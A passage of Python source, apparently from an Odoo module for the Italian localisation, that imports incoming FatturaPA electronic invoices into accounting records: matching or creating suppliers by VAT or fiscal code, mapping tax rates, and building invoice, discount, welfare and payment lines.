re.sub(r\"\\W+\", \"\", DatiAnagrafici.IdFiscaleIVA.IdCodice).upper()\n # Format Italian VAT ID to always have 11 char\n # to avoid validation error when creating the given partner\n if id_paese == \"IT\" and not id_codice.startswith(\"IT\"):\n vat = \"IT{}\".format(id_codice.rjust(11, \"0\")[:11])\n # XXX maybe San Marino needs special formatting too?\n else:\n vat = id_codice\n partners = partner_model\n res_partner_rule = self.sudo().env.ref(\n \"base.res_partner_rule\", raise_if_not_found=False\n )\n if vat:\n domain = [(\"vat\", \"=\", vat)]\n if (\n self.env.context.get(\"from_attachment\")\n and res_partner_rule\n and res_partner_rule.active\n ):\n att = self.env.context.get(\"from_attachment\")\n domain.extend(\n [\n \"|\",\n (\"company_id\", \"child_of\", att.company_id.id),\n (\"company_id\", \"=\", False),\n ]\n )\n partners = partner_model.search(domain)\n if not partners and cf:\n domain = [(\"fiscalcode\", \"=\", cf)]\n if (\n self.env.context.get(\"from_attachment\")\n and res_partner_rule\n and res_partner_rule.active\n ):\n att = self.env.context.get(\"from_attachment\")\n domain.extend(\n [\n \"|\",\n (\"company_id\", \"child_of\", att.company_id.id),\n (\"company_id\", \"=\", False),\n ]\n )\n partners = partner_model.search(domain)\n commercial_partner_id = False\n if len(partners) > 1:\n for partner in partners:\n if (\n commercial_partner_id\n and partner.commercial_partner_id.id != commercial_partner_id\n ):\n self.log_inconsistency(\n _(\n \"Two distinct partners with \"\n \"VAT number %(vat)s or Fiscal Code %(fiscalcode)s already \"\n \"present in db.\"\n )\n % {\"vat\": vat, \"fiscalcode\": cf}\n )\n return False\n commercial_partner_id = partner.commercial_partner_id.id\n if partners:\n if not commercial_partner_id:\n commercial_partner_id = partners[0].commercial_partner_id.id\n self.check_partner_base_data(commercial_partner_id, DatiAnagrafici)\n return commercial_partner_id\n else:\n # partner to be created\n country_id = False\n if DatiAnagrafici.IdFiscaleIVA:\n CountryCode = DatiAnagrafici.IdFiscaleIVA.IdPaese\n countries = self.CountryByCode(CountryCode)\n if countries:\n country_id = countries[0].id\n else:\n raise 
UserError(\n _(\"Country Code %s not found in system.\") % CountryCode\n )\n vals = {\n \"vat\": vat,\n \"fiscalcode\": cf,\n \"is_company\": (\n DatiAnagrafici.Anagrafica.Denominazione and True or False\n ),\n \"eori_code\": DatiAnagrafici.Anagrafica.CodEORI or \"\",\n \"country_id\": country_id,\n }\n if DatiAnagrafici.Anagrafica.Nome:\n vals[\"firstname\"] = DatiAnagrafici.Anagrafica.Nome\n if DatiAnagrafici.Anagrafica.Cognome:\n vals[\"lastname\"] = DatiAnagrafici.Anagrafica.Cognome\n if DatiAnagrafici.Anagrafica.Denominazione:\n vals[\"name\"] = DatiAnagrafici.Anagrafica.Denominazione\n\n return partner_model.create(vals).id\n\n def getCedPrest(self, cedPrest):\n partner_model = self.env[\"res.partner\"]\n # Assume that any non-IT VAT coming from SdI is correct\n partner_id = self.with_context(\n fatturapa_in_skip_no_it_vat_check=True,\n ).getPartnerBase(cedPrest.DatiAnagrafici)\n no_contact_update = False\n if partner_id:\n no_contact_update = partner_model.browse(\n partner_id\n ).electronic_invoice_no_contact_update\n fiscalPosModel = self.env[\"fatturapa.fiscal_position\"]\n if partner_id and not no_contact_update:\n partner_company_id = partner_model.browse(partner_id).company_id.id\n vals = {\n \"street\": \" \".join(\n map(\n str,\n filter(\n None, (cedPrest.Sede.Indirizzo, cedPrest.Sede.NumeroCivico)\n ),\n )\n ),\n \"zip\": cedPrest.Sede.CAP,\n \"city\": cedPrest.Sede.Comune,\n \"register\": cedPrest.DatiAnagrafici.AlboProfessionale or \"\",\n }\n if cedPrest.DatiAnagrafici.ProvinciaAlbo:\n ProvinciaAlbo = cedPrest.DatiAnagrafici.ProvinciaAlbo\n prov = self.ProvinceByCode(ProvinciaAlbo)\n if not prov:\n self.log_inconsistency(\n _(\"Register Province ( %s ) not present \" \"in your system\")\n % ProvinciaAlbo\n )\n else:\n vals[\"register_province\"] = prov[0].id\n if cedPrest.Sede.Provincia:\n Provincia = cedPrest.Sede.Provincia\n prov_sede = self.ProvinceByCode(Provincia)\n if not prov_sede:\n self.log_inconsistency(\n _(\"Province ( %s ) not present in your system\") % Provincia\n )\n else:\n vals[\"state_id\"] = prov_sede[0].id\n\n vals[\"register_code\"] = cedPrest.DatiAnagrafici.NumeroIscrizioneAlbo\n vals[\"register_regdate\"] = cedPrest.DatiAnagrafici.DataIscrizioneAlbo\n\n if cedPrest.DatiAnagrafici.RegimeFiscale:\n rfPos = cedPrest.DatiAnagrafici.RegimeFiscale\n FiscalPos = fiscalPosModel.search([(\"code\", \"=\", rfPos)])\n if not FiscalPos:\n raise UserError(\n _(\"Tax Regime %s not present in your system.\") % rfPos\n )\n else:\n vals[\"register_fiscalpos\"] = FiscalPos[0].id\n\n if cedPrest.IscrizioneREA:\n REA = cedPrest.IscrizioneREA\n offices = self.ProvinceByCode(REA.Ufficio)\n rea_nr = REA.NumeroREA\n\n if not offices:\n office_id = False\n self.log_inconsistency(\n _(\n \"REA Office Province Code ( %s ) not present in \"\n \"your system\"\n )\n % REA.Ufficio\n )\n else:\n office_id = offices[0].id\n vals[\"rea_office\"] = office_id\n\n rea_domain = [\n (\"rea_code\", \"=\", rea_nr),\n (\"company_id\", \"=\", partner_company_id),\n (\"id\", \"!=\", partner_id),\n ]\n if office_id:\n rea_domain.append((\"rea_office\", \"=\", office_id))\n rea_partners = partner_model.search(rea_domain)\n if rea_partners:\n rea_names = \", \".join(rea_partners.mapped(\"name\"))\n p_name = partner_model.browse(partner_id).name\n self.log_inconsistency(\n _(\n \"Current invoice is from {} with REA Code\"\n \" {}. Yet it seems that partners {} have the same\"\n \" REA Code. 
This code should be unique; please fix\"\n \" it.\"\n ).format(p_name, rea_nr, rea_names)\n )\n else:\n vals[\"rea_code\"] = REA.NumeroREA\n\n vals[\"rea_capital\"] = REA.CapitaleSociale or 0.0\n vals[\"rea_member_type\"] = REA.SocioUnico or False\n vals[\"rea_liquidation_state\"] = REA.StatoLiquidazione or False\n\n if cedPrest.Contatti:\n if cedPrest.Contatti.Telefono:\n vals[\"phone\"] = cedPrest.Contatti.Telefono\n if cedPrest.Contatti.Email:\n vals[\"email\"] = cedPrest.Contatti.Email\n partner_model.browse(partner_id).write(vals)\n return partner_id\n\n def getCarrirerPartner(self, Carrier):\n partner_model = self.env[\"res.partner\"]\n partner_id = self.getPartnerBase(Carrier.DatiAnagraficiVettore)\n no_contact_update = False\n if partner_id:\n no_contact_update = partner_model.browse(\n partner_id\n ).electronic_invoice_no_contact_update\n if partner_id and not no_contact_update:\n vals = {\n \"license_number\": Carrier.DatiAnagraficiVettore.NumeroLicenzaGuida\n or \"\",\n }\n partner_model.browse(partner_id).write(vals)\n return partner_id\n\n def _prepare_generic_line_data(self, line):\n retLine = {}\n account_taxes = self.get_account_taxes(line.AliquotaIVA, line.Natura)\n if account_taxes:\n retLine[\"tax_ids\"] = [fields.Command.set([account_taxes[0].id])]\n else:\n retLine[\"tax_ids\"] = [fields.Command.clear()]\n return retLine\n\n def _get_default_product_taxes(self, tax_field_name):\n \"\"\"Return default tax for field `product.product.`.\"\"\"\n company = self.env.company\n default_taxes_ids = self.env[\"ir.default\"].get(\n \"product.product\",\n tax_field_name,\n company_id=company.id,\n )\n tax_model = self.env[\"account.tax\"]\n if default_taxes_ids is not None:\n default_taxes = tax_model.browse(default_taxes_ids)\n default_tax = first(default_taxes)\n else:\n default_tax = tax_model.browse()\n return default_tax\n\n def _get_account_tax_domain(self, amount):\n return [\n (\"type_tax_use\", \"=\", \"purchase\"),\n (\"amount\", \"=\", amount),\n ]\n\n def _get_zero_kind_account_tax(self, Natura):\n tax_amount = 0\n tax_domain = self._get_account_tax_domain(tax_amount)\n tax_domain = expression.AND(\n [\n tax_domain,\n [\n (\"kind_id.code\", \"=\", Natura),\n ],\n ]\n )\n account_taxes = self.env[\"account.tax\"].search(\n tax_domain,\n order=\"sequence\",\n )\n account_tax = first(account_taxes)\n if not account_taxes:\n self.log_inconsistency(\n _(\n \"No tax with percentage \"\n \"%(percentage)s and nature %(nature)s found. Please configure this tax.\",\n percentage=tax_amount,\n nature=Natura,\n )\n )\n elif len(account_taxes) > 1:\n self.log_inconsistency(\n _(\n \"Too many taxes with percentage \"\n \"%(percentage)s and nature %(nature)s found. 
\"\n \"Tax %(tax)s with lower priority has \"\n \"been set on invoice lines.\",\n percentage=tax_amount,\n nature=Natura,\n tax=account_tax.description,\n )\n )\n return account_tax\n\n def _get_amount_account_tax(self, tax_amount):\n tax_domain = self._get_account_tax_domain(tax_amount)\n tax_domain = expression.AND(\n [\n tax_domain,\n [\n (\"price_include\", \"=\", False),\n # partially deductible VAT must be set by user\n (\"children_tax_ids\", \"=\", False),\n ],\n ]\n )\n account_taxes = self.env[\"account.tax\"].search(\n tax_domain,\n order=\"sequence\",\n )\n account_tax = first(account_taxes)\n if not account_taxes:\n self.log_inconsistency(\n _(\n \"XML contains tax with percentage '%s' \"\n \"but it does not exist in your system\",\n tax_amount,\n )\n )\n # check if there are multiple taxes with\n # same percentage\n elif len(account_taxes) > 1:\n # just logging because this is an usual case: see split payment\n _logger.warning(\n _(\n \"Too many taxes with percentage equals \"\n \"to '%s'.\\nFix it if required\",\n tax_amount,\n )\n )\n # if there are multiple taxes with same percentage\n # and there is a default tax with this percentage,\n # set taxes list equal to supplier_taxes_id\n default_tax = self._get_default_product_taxes(\"supplier_taxes_id\")\n if default_tax and default_tax.amount == tax_amount:\n account_tax = default_tax\n return account_tax\n\n def get_account_taxes(self, AliquotaIVA, Natura):\n tax_amount = float(AliquotaIVA)\n if tax_amount == 0.0 and Natura:\n account_tax = self._get_zero_kind_account_tax(Natura)\n else:\n account_tax = self._get_amount_account_tax(tax_amount)\n return account_tax\n\n def get_line_product(self, line, partner):\n product = self.env[\"product.product\"].browse()\n\n # Search the product using supplier infos\n supplier_info = self.env[\"product.supplierinfo\"]\n partner_supplier_info = supplier_info.search(\n [\n (\"partner_id\", \"=\", partner.id),\n ]\n )\n found_supplier_infos = supplier_info.browse()\n if len(line.CodiceArticolo or []) == 1:\n supplier_code = line.CodiceArticolo[0].CodiceValore\n found_supplier_infos = supplier_info.search(\n [\n (\"id\", \"in\", partner_supplier_info.ids),\n (\"product_code\", \"=\", supplier_code),\n ]\n )\n if not found_supplier_infos:\n supplier_name = line.Descrizione\n found_supplier_infos = supplier_info.search(\n [\n (\"id\", \"in\", partner_supplier_info.ids),\n (\"product_name\", \"=\", supplier_name),\n ]\n )\n\n if found_supplier_infos:\n products = found_supplier_infos.mapped(\"product_id\")\n if len(products) == 1:\n product = first(products)\n else:\n templates = found_supplier_infos.mapped(\"product_tmpl_id\")\n if len(templates) == 1:\n product = templates.product_variant_id\n\n if not product and partner.e_invoice_default_product_id:\n product = partner.e_invoice_default_product_id\n return product\n\n def adjust_accounting_data(self, product, line_vals):\n account = self.get_credit_account(product)\n line_vals[\"account_id\"] = account.id\n\n new_tax = None\n if len(product.product_tmpl_id.supplier_taxes_id) == 1:\n new_tax = product.product_tmpl_id.supplier_taxes_id[0]\n elif len(account.tax_ids) == 1:\n new_tax = account.tax_ids[0]\n line_tax = self.env[\"account.tax\"]\n if line_vals.get(\"tax_ids\") and line_vals[\"tax_ids\"][0] == fields.Command.SET:\n line_tax_id = line_vals[\"tax_ids\"][0][2][0]\n line_tax = self.env[\"account.tax\"].browse(line_tax_id)\n if new_tax and line_tax and new_tax != line_tax:\n if new_tax._get_tax_amount() != line_tax._get_tax_amount():\n 
self.log_inconsistency(\n _(\n \"XML contains tax %(line_tax)s. \"\n \"Product %(product)s has tax %(new_tax)s. Using \"\n \"the XML one\"\n )\n % {\n \"line_tax\": line_tax.name,\n \"product\": product.name,\n \"new_tax\": new_tax.name,\n }\n )\n else:\n # If product has the same amount of the one in XML,\n # I use it. Typical case: 22% det 50%\n line_vals[\"tax_ids\"] = [(6, 0, [new_tax.id])]\n\n # move_line.tax_ids\n # move_line.name\n # move_line.sequence\n # move_line.account_id\n # move_line.price_unit\n # move_line.quantity\n def _prepareInvoiceLineAliquota(self, credit_account_id, line, nline):\n retLine = {}\n account_taxes = self.get_account_taxes(line.AliquotaIVA, line.Natura)\n if account_taxes:\n retLine[\"tax_ids\"] = [fields.Command.set([account_taxes[0].id])]\n else:\n retLine[\"tax_ids\"] = [fields.Command.clear()]\n\n retLine.update(\n {\n \"name\": \"Riepilogo Aliquota {}\".format(line.AliquotaIVA),\n \"sequence\": nline,\n \"account_id\": credit_account_id,\n \"price_unit\": float(abs(line.ImponibileImporto)),\n }\n )\n return retLine\n\n # move_line.name\n # move_line.sequence\n # move_line.account_id\n # move_line.price_unit\n # move_line.quantity\n # move_line.discount\n # move_line.admin_ref\n # move_line.invoice_line_tax_wt_ids\n def _prepareInvoiceLine(self, credit_account_id, line, wt_founds=False):\n retLine = self._prepare_generic_line_data(line)\n retLine.update(\n {\n \"name\": line.Descrizione,\n \"sequence\": int(line.NumeroLinea),\n \"account_id\": credit_account_id,\n \"price_unit\": float(line.PrezzoUnitario),\n \"display_type\": \"product\",\n }\n )\n if line.Quantita is None:\n retLine[\"quantity\"] = 1.0\n else:\n retLine[\"quantity\"] = float(line.Quantita)\n if (\n float(line.PrezzoUnitario)\n and line.Quantita\n and float(line.Quantita)\n and line.ScontoMaggiorazione # Quantita not required\n ):\n retLine[\"discount\"] = self._computeDiscount(line)\n if line.RiferimentoAmministrazione:\n retLine[\"admin_ref\"] = line.RiferimentoAmministrazione\n if wt_founds and line.Ritenuta:\n retLine[\"invoice_line_tax_wt_ids\"] = [(6, 0, [x.id for x in wt_founds])]\n\n return retLine\n\n def _prepareRelDocsLine(self, invoice_id, line, doc_type):\n res = []\n lineref = line.RiferimentoNumeroLinea or False\n IdDoc = line.IdDocumento or \"Error\"\n Data = line.Data or False\n NumItem = line.NumItem or \"\"\n Code = line.CodiceCommessaConvenzione or \"\"\n Cig = line.CodiceCIG or \"\"\n Cup = line.CodiceCUP or \"\"\n invoice_lineid = False\n if lineref:\n for numline in lineref:\n invoice_lineid = False\n invoice_line_model = self.env[\"account.move.line\"]\n invoice_lines = invoice_line_model.search(\n [\n (\"move_id\", \"=\", invoice_id),\n (\"sequence\", \"=\", int(numline)),\n ]\n )\n if invoice_lines:\n invoice_lineid = invoice_lines[0].id\n val = {\n \"type\": doc_type,\n \"name\": IdDoc,\n \"lineRef\": numline,\n \"invoice_line_id\": invoice_lineid,\n \"invoice_id\": invoice_id,\n \"date\": Data,\n \"numitem\": NumItem,\n \"code\": Code,\n \"cig\": Cig,\n \"cup\": Cup,\n }\n res.append(val)\n else:\n val = {\n \"type\": doc_type,\n \"name\": IdDoc,\n \"invoice_line_id\": invoice_lineid,\n \"invoice_id\": invoice_id,\n \"date\": Data,\n \"numitem\": NumItem,\n \"code\": Code,\n \"cig\": Cig,\n \"cup\": Cup,\n }\n res.append(val)\n return res\n\n def _prepareWelfareLine(self, invoice_id, line):\n TipoCassa = line.TipoCassa or False\n AlCassa = line.AlCassa and (float(line.AlCassa) / 100) or None\n ImportoContributoCassa = (\n line.ImportoContributoCassa and 
float(line.ImportoContributoCassa) or None\n )\n ImponibileCassa = line.ImponibileCassa and float(line.ImponibileCassa) or None\n AliquotaIVA = line.AliquotaIVA and (float(line.AliquotaIVA) / 100) or None\n Ritenuta = line.Ritenuta or \"\"\n Natura = line.Natura or False\n kind_id = False\n if Natura:\n kind = self.env[\"account.tax.kind\"].search([(\"code\", \"=\", Natura)])\n if not kind:\n self.log_inconsistency(_(\"Tax kind %s not found\") % Natura)\n else:\n kind_id = kind[0].id\n\n RiferimentoAmministrazione = line.RiferimentoAmministrazione or \"\"\n WelfareTypeModel = self.env[\"welfare.fund.type\"]\n if not TipoCassa:\n raise UserError(_(\"Welfare Fund is not defined.\"))\n WelfareType = WelfareTypeModel.search([(\"name\", \"=\", TipoCassa)])\n\n res = {\n \"welfare_rate_tax\": AlCassa,\n \"welfare_amount_tax\": ImportoContributoCassa,\n \"welfare_taxable\": ImponibileCassa,\n \"welfare_Iva_tax\": AliquotaIVA,\n \"subjected_withholding\": Ritenuta,\n \"kind_id\": kind_id,\n \"pa_line_code\": RiferimentoAmministrazione,\n \"invoice_id\": invoice_id,\n }\n if not WelfareType:\n raise UserError(\n _(\"Welfare Fund %s not present in your system.\") % TipoCassa\n )\n else:\n res[\"name\"] = WelfareType[0].id\n\n return res\n\n def _prepareDiscRisePriceLine(self, line_id, line):\n Tipo = line.Tipo or False\n Percentuale = line.Percentuale and float(line.Percentuale) or 0.0\n Importo = line.Importo and float(line.Importo) or 0.0\n res = {\n \"percentage\": Percentuale,\n \"amount\": Importo,\n self.env.context.get(\"drtype\"): line_id,\n }\n res[\"name\"] = Tipo\n\n return res\n\n def _computeDiscount(self, DettaglioLinea):\n line_total = float(DettaglioLinea.PrezzoTotale)\n line_unit = line_total / float(DettaglioLinea.Quantita)\n discount = (1 - (line_unit / float(DettaglioLinea.PrezzoUnitario))) * 100.0\n return discount\n\n def _addGlobalDiscount(self, invoice_id, DatiGeneraliDocumento):\n discount = 0.0\n if (\n DatiGeneraliDocumento.ScontoMaggiorazione\n and self.e_invoice_detail_level == \"2\"\n ):\n invoice = self.env[\"account.move\"].browse(invoice_id)\n for DiscRise in DatiGeneraliDocumento.ScontoMaggiorazione:\n if DiscRise.Percentuale:\n amount = invoice.amount_total * (float(DiscRise.Percentuale) / 100)\n if DiscRise.Tipo == \"SC\":\n discount -= amount\n elif DiscRise.Tipo == \"MG\":\n discount += amount\n elif DiscRise.Importo:\n if DiscRise.Tipo == \"SC\":\n discount -= float(DiscRise.Importo)\n elif DiscRise.Tipo == \"MG\":\n discount += float(DiscRise.Importo)\n company = invoice.company_id\n global_discount_product = company.sconto_maggiorazione_product_id\n credit_account = self.get_credit_account(\n product=global_discount_product,\n )\n line_vals = {\n \"move_id\": invoice_id,\n \"name\": _(\"Global bill discount from document general data\"),\n \"account_id\": credit_account.id,\n \"price_unit\": discount,\n \"quantity\": 1,\n }\n if global_discount_product:\n line_vals[\"product_id\"] = global_discount_product.id\n line_vals[\"name\"] = global_discount_product.name\n self.adjust_accounting_data(global_discount_product, line_vals)\n else:\n line_vals[\"tax_ids\"] = [fields.Command.clear()]\n self.env[\"account.move.line\"].with_context(\n check_move_validity=False\n ).create(line_vals)\n return True\n\n def _createPaymentsLine(self, payment_id, line, partner_id, invoice):\n details = line.DettaglioPagamento or False\n if details:\n PaymentModel = self.env[\"fatturapa.payment.detail\"]\n PaymentMethodModel = self.env[\"fatturapa.payment_method\"]\n BankModel = 
self.env[\"res.bank\"]\n PartnerBankModel = self.env[\"res.partner.bank\"]\n for dline in details:\n method = PaymentMethodModel.search(\n [(\"code\", \"=\", dline.ModalitaPagamento)]\n )\n if not method:\n raise UserError(\n _(\"Payment method %s is not defined in your system.\")\n % dline.ModalitaPagamento\n )\n val = {\n \"recipient\": dline.Beneficiario,\n \"fatturapa_pm_id\": method[0].id,\n \"payment_term_start\": dline.DataRiferimentoTerminiPagamento\n or False,\n \"payment_days\": dline.GiorniTerminiPagamento or 0,\n \"payment_due_date\": dline.DataScadenzaPagamento or False,\n \"payment_amount\": dline.ImportoPagamento or 0.0,\n \"post_office_code\": dline.CodUfficioPostale or \"\",\n \"recepit_surname\": dline.CognomeQuietanzante or \"\",\n \"recepit_name\": dline.NomeQuietanzante or \"\",\n \"recepit_cf\": dline.CFQuietanzante or \"\",\n \"recepit_title\": dline.TitoloQuietanzante or \"1\",\n \"payment_bank_name\": dline.IstitutoFinanziario or \"\",\n \"payment_bank_iban\": dline.IBAN or \"\",\n \"payment_bank_abi\": dline.ABI or \"\",\n \"payment_bank_cab\": dline.CAB or \"\",\n \"payment_bank_bic\": dline.BIC or \"\",\n \"payment_bank\": False,\n \"prepayment_discount\": dline.ScontoPagamentoAnticipato or 0.0,\n \"max_payment_date\": dline.DataLimitePagamentoAnticipato or False,\n \"penalty_amount\": dline.PenalitaPagamentiRitardati or 0.0,\n \"penalty_date\": dline.DataDecorrenzaPenale or False,\n \"payment_code\": dline.CodicePagamento or \"\",\n \"payment_data_id\": payment_id,\n }\n bank = False\n payment_bank_id = False\n if dline.BIC:\n banks = BankModel.search([(\"bic\", \"=\", dline.BIC.strip())])\n if not banks:\n if not dline.IstitutoFinanziario:\n self.log_inconsistency(\n _(\n \"Name of Bank with BIC '%s' is not set.\"\n \" Can't create bank\"\n )\n % dline.BIC\n )\n else:\n bank = BankModel.create(\n {\n \"name\": dline.IstitutoFinanziario,\n \"bic\": dline.BIC,\n }\n )\n else:\n bank = banks[0]\n if dline.IBAN:\n iban = dline.IBAN.strip()\n SearchDom = [\n (\"acc_number\", \"=\", pretty_iban(iban)),\n (\"partner_id\", \"=\", partner_id),\n ]\n payment_bank_id = False\n payment_banks = PartnerBankModel.search(SearchDom)\n if not payment_banks and not bank:\n self.log_inconsistency(\n _(\n \"BIC is required and not exist in Xml\\n\"\n \"Curr bank data is: \\n\"\n \"IBAN: %(iban)s\\n\"\n \"Bank Name: %(bank)s\\n\"\n )\n % {\n \"iban\": iban or \"\",\n \"bank\": dline.IstitutoFinanziario or \"\",\n }\n )\n elif not payment_banks and bank:\n existing_account = PartnerBankModel.search(\n [\n (\"acc_number\", \"=\", iban),\n (\"company_id\", \"=\", invoice.company_id.id),\n ]\n )\n if existing_account:\n self.log_inconsistency(\n _(\"Bank account %s already exists\") % iban\n )\n else:\n payment_bank_id = PartnerBankModel.create(\n {\n \"acc_number\": iban,\n \"partner_id\": partner_id,\n \"bank_id\": bank.id,\n \"bank_name\": dline.IstitutoFinanziario or bank.name,\n \"bank_bic\": dline.BIC or bank.bic,\n }\n ).id\n if payment_banks:\n payment_bank_id = payment_banks[0].id\n\n if payment_bank_id:\n val[\"payment_bank\"] = payment_bank_id\n PaymentModel.create(val)\n return True\n\n # TODO sul partner?\n def set_StabileOrganizzazione(self, CedentePrestatore, invoice):\n if CedentePrestatore.StabileOrganizzazione:\n invoice.efatt_stabile_organizzazione_indirizzo = (\n CedentePrestatore.StabileOrganizzazione.Indirizzo\n )\n invoice.efatt_stabile_organizzazione_civico = (\n CedentePrestatore.StabileOrganizzazione.NumeroCivico\n )\n invoice.efatt_stabile_organizzazione_cap 
= (\n CedentePrestatore.StabileOrganizzazione.CAP\n )\n invoice.efatt_stabile_organizzazione_comune = (\n CedentePrestatore.StabileOrganizzazione.Comune\n )\n invoice.efatt_stabile_organizzazione_provincia = (\n CedentePrestatore.StabileOrganizzazione.Provincia\n )\n invoice.efatt_stabile_organizzazione_nazione = (\n CedentePrestatore.StabileOrganizzazione.Nazione\n )\n\n def _get_journal_domain(self, company):\n return [\n (\"type\", \"=\", \"purchase\"),\n (\"company_id\", \"=\", company.id),\n ]\n\n def get_journal(self, company):\n domain = self._get_journal_domain(company)\n journal = self.env[\"account.journal\"].search(\n domain,\n limit=1,\n )\n if not journal:\n exception = self._get_missing_journal_exception(company)\n raise exception\n return journal\n\n def _get_missing_journal_exception(self, company):\n return UserError(\n _(\n \"Define a purchase journal for this company: '%(name)s' (id: %(id)s).\",\n name=company.name,\n id=company.id,\n )\n )\n\n def create_e_invoice_line(self, line):\n vals = {\n \"line_number\": int(line.NumeroLinea or 0),\n \"service_type\": line.TipoCessionePrestazione,\n \"name\": line.Descrizione,\n \"qty\": float(line.Quantita or 0),\n \"uom\": line.UnitaMisura,\n \"period_start_date\": line.DataInizioPeriodo,\n \"period_end_date\": line.DataFinePeriodo,\n \"unit_price\": float(line.PrezzoUnitario or 0),\n \"total_price\": float(line.PrezzoTotale or 0),\n \"tax_amount\": float(line.AliquotaIVA or 0),\n \"wt_amount\": line.Ritenuta,\n \"tax_kind\": line.Natura,\n \"admin_ref\": line.RiferimentoAmministrazione,\n }\n einvoiceline = self.env[\"einvoice.line\"].create(vals)\n if line.CodiceArticolo:\n for caline in line.CodiceArticolo:\n self.env[\"fatturapa.article.code\"].create(\n {\n \"name\": caline.CodiceTipo or \"\",\n \"code_val\": caline.CodiceValore or \"\",\n \"e_invoice_line_id\": einvoiceline.id,\n }\n )\n if line.ScontoMaggiorazione:\n for DiscRisePriceLine in line.ScontoMaggiorazione:\n DiscRisePriceVals = self.with_context(\n drtype=\"e_invoice_line_id\"\n )._prepareDiscRisePriceLine(einvoiceline.id, DiscRisePriceLine)\n self.env[\"discount.rise.price\"].create(DiscRisePriceVals)\n if line.AltriDatiGestionali:\n for dato in line.AltriDatiGestionali:\n self.env[\"einvoice.line.other.data\"].create(\n {\n \"name\": dato.TipoDato,\n \"text_ref\": dato.RiferimentoTesto,\n \"num_ref\": float(dato.RiferimentoNumero or 0),\n \"date_ref\": dato.RiferimentoData,\n \"e_invoice_line_id\": einvoiceline.id,\n }\n )\n return einvoiceline\n\n def get_credit_account(self, product=None):\n \"\"\"\n Try to get default credit account for invoice line looking in\n\n 1) product (if provided)\n 2) journal\n 3) company default.\n\n :param product: Product whose expense account will be used\n :return: The account found\n \"\"\"\n credit_account = self.env[\"account.account\"].browse()\n\n # If there is a product, get its default expense account\n if product:\n template = product.product_tmpl_id\n accounts_dict = template.get_product_accounts()\n credit_account = accounts_dict[\"expense\"]\n\n company = self.env.company\n # Search in journal\n journal = self.get_journal(company)\n if not credit_account:\n credit_account = journal.default_account_id\n\n # Search in company defaults\n if not credit_account:\n credit_account = (\n self.env[\"ir.property\"]\n .with_company(company)\n ._get(\"property_account_expense_categ_id\", \"product.category\")\n )\n\n if not credit_account:\n raise UserError(\n _(\n \"Please configure Default Credit Account \"\n \"in Journal 
'{journal}' \"\n \"or check default expense account \"\n \"for company '{company}'.\"\n ).format(\n journal=journal.display_name,\n company=company.display_name,\n )\n )\n\n return credit_account\n\n def _get_currency(self, FatturaBody):\n # currency 2.1.1.2\n currency_code = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Divisa\n currency = self.env[\"res.currency\"].search(\n [\n (\"name\", \"=\", currency_code),\n ]\n )\n if not currency:\n raise UserError(\n _(\n \"No currency found with code %s.\",\n currency_code,\n )\n )\n return currency\n\n def _get_fiscal_document_type(self, FatturaBody):\n fiscal_document_type_code = (\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.TipoDocumento\n )\n if fiscal_document_type_code:\n fiscal_document_type = self.env[\"fiscal.document.type\"].search(\n [\n (\"code\", \"=\", fiscal_document_type_code),\n ],\n limit=1,\n )\n if not fiscal_document_type:\n raise UserError(\n _(\n \"Document type %s not handled.\",\n fiscal_document_type_code,\n )\n )\n else:\n fiscal_document_type = self.env[\"fiscal.document.type\"].browse()\n return fiscal_document_type\n\n def _get_invoice_type(self, fiscal_document_type):\n if fiscal_document_type.code == \"TD04\":\n invoice_type = \"in_refund\"\n else:\n invoice_type = \"in_invoice\"\n return invoice_type\n\n def _get_received_date(self, attachment):\n received_date = attachment.e_invoice_received_date\n if not received_date:\n received_date = attachment.create_date\n received_date = received_date.date()\n return received_date\n\n def _prepare_invoice_values(self, fatt, fatturapa_attachment, FatturaBody, partner):\n company = self.env.company\n currency = self._get_currency(FatturaBody)\n purchase_journal = self.get_journal(company)\n comment = \"\"\n\n # 2.1.1\n fiscal_document_type = self._get_fiscal_document_type(FatturaBody)\n invoice_type = self._get_invoice_type(fiscal_document_type)\n\n # 2.1.1.11\n causLst = FatturaBody.DatiGenerali.DatiGeneraliDocumento.Causale\n if causLst:\n for rel_doc in causLst:\n comment += rel_doc + \"\\n\"\n if comment:\n comment = \"\" + comment + \" \"\n\n e_invoice_received_date = self._get_received_date(fatturapa_attachment)\n\n e_invoice_date = datetime.strptime(\n FatturaBody.DatiGenerali.DatiGeneraliDocumento.Data, \"%Y-%m-%d\"\n ).date()\n\n delivery_partner_id = partner.address_get([\"delivery\"])[\"delivery\"]\n delivery_partner = self.env[\"res.partner\"].browse(delivery_partner_id)\n fiscal_position = self.env[\"account.fiscal.position\"]._get_fiscal_position(\n partner,\n delivery=delivery_partner,\n )\n\n invoice_data = {\n \"e_invoice_received_date\": e_invoice_received_date,\n \"invoice_date\": e_invoice_date,\n \"date\": e_invoice_received_date\n if company.in_invoice_registration_date == \"rec_date\"\n else e_invoice_date,\n \"fiscal_document_type_id\": fiscal_document_type.id,\n \"sender\": fatt.FatturaElettronicaHeader.SoggettoEmittente or False,\n \"move_type\": invoice_type,\n \"partner_id\": partner.id,\n \"currency_id\": currency.id,\n \"journal_id\": purchase_journal.id,\n # 'origin': xmlData.datiOrdineAcquisto,\n \"fiscal_position_id\": fiscal_position.id,\n \"invoice_payment_term_id\": partner.property_supplier_payment_term_id.id,\n \"company_id\": company.id,\n \"fatturapa_attachment_in_id\": fatturapa_attachment.id,\n \"narration\": comment,\n }\n\n # 2.1.1.12\n self.set_art73(FatturaBody, invoice_data)\n\n self.set_e_invoice_lines(FatturaBody, invoice_data)\n return invoice_data\n\n def invoiceCreate(self, fatt, fatturapa_attachment, FatturaBody, 
